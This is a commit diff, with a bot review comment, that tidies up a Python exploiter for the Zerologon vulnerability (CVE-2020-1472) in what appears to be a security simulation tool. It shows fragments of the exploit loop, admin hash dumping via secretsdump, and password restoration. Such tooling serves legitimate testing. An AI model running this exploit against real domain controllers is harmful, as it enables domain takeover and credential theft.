Testing changes

Shreya 2021-02-12 13:58:19 +05:30
parent 2c2a9eaaae
commit 0866aee2cf
2 changed files with 12 additions and 8 deletions


@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/. Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
""" """
import io
import logging import logging
import os import os
import sys
from binascii import unhexlify from binascii import unhexlify
from typing import List, Optional from typing import List, Optional
import impacket import impacket
from impacket.dcerpc.v5 import epm, nrpc, transport from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
LOG.debug("Attempting exploit.") LOG.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con) _exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect()
else: else:
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.") LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
_exploited = False _exploited = False
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
return _exploited return _exploited
def is_exploitable(self) -> bool: def is_exploitable(self) -> bool:
if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']: if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
return True return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
return self.zerologon_finger.get_host_fingerprint(self.host) return self.zerologon_finger.get_host_fingerprint(self.host)
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]: def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
# Max attempts = 2000. Expected average number of attempts needed: 256. # Max attempts = 2000. Expected average number of attempts needed: 256.
result_exploit_attempt = None
for _ in range(0, self.MAX_ATTEMPTS): for _ in range(0, self.MAX_ATTEMPTS):
try: try:
result_exploit_attempt = self.attempt_exploit(rpc_con) result_exploit_attempt = self.attempt_exploit(rpc_con)
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
except Exception as e: except Exception as e:
LOG.error(e) LOG.error(e)
finally:
if rpc_con:
rpc_con.disconnect()
def get_admin_pwd_hashes(self) -> str: def get_admin_pwd_hashes(self) -> str:
try: try:
options = OptionsForSecretsdump( options = OptionsForSecretsdump(
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
except Exception as e: except Exception as e:
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}") LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]: def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
# Max attempts = 2000. Expected average number of attempts needed: 256. # Max attempts = 2000. Expected average number of attempts needed: 256.
result_restoration_attempt = None
for _ in range(0, self.MAX_ATTEMPTS): for _ in range(0, self.MAX_ATTEMPTS):
try: try:
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash) result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
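Review bot: The `rpc_con.disconnect()` added after `_send_exploit_rpc_login_requests(rpc_con)` in the second hunk runs only when that call returns normally, so an exception escaping it would leave the RPC connection to the target open. The fourth hunk already uses `finally:` for the same cleanup; doing the same here (`try:` around the call, then `finally: rpc_con.disconnect()`) would keep the two paths consistent. In that fourth hunk, `if rpc_con:` only works if `rpc_con` is bound before the `try` begins, which is not visible here; if it is first assigned inside the `try`, add `rpc_con = None` above it so the cleanup cannot raise and mask the original error. Both enclosing methods start and end outside the hunks shown.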


@ -1,7 +1,5 @@
import io
import logging import logging
import os import os
import sys
import traceback import traceback
from impacket.examples.secretsdump import (LocalOperations, LSASecrets, from impacket.examples.secretsdump import (LocalOperations, LSASecrets,